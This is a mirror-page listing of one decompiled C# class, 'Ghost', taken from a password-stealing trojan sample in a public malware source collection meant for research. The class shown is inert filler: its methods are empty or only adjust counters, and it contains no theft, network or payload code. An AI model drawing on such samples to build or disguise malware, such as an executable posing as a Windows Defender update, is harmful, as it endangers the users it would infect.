mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-06 18:35:27 +00:00
f2ac1ece55
add
43 lines
963 B
C#
43 lines
963 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Ghost
|
|
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
|
|
|
|
internal class Ghost
|
|
{
|
|
private int Current;
|
|
public string[] StringExclusion;
|
|
public string[] NameExclusion;
|
|
public int Numbers;
|
|
public long Equations;
|
|
|
|
public Ghost()
|
|
{
|
|
this.StringExclusion = new string[0];
|
|
this.NameExclusion = new string[0];
|
|
}
|
|
|
|
private void Store(string data)
|
|
{
|
|
if (data.Length != 0)
|
|
;
|
|
}
|
|
|
|
public void Process() => this.Current = 0;
|
|
|
|
private void ProcessStrings()
|
|
{
|
|
}
|
|
|
|
private void ProcessNames()
|
|
{
|
|
}
|
|
|
|
private void ProcessNumbers() => this.Equations += 6L;
|
|
|
|
private void ProcessNumber(int value, string result)
|
|
{
|
|
}
|
|
}
|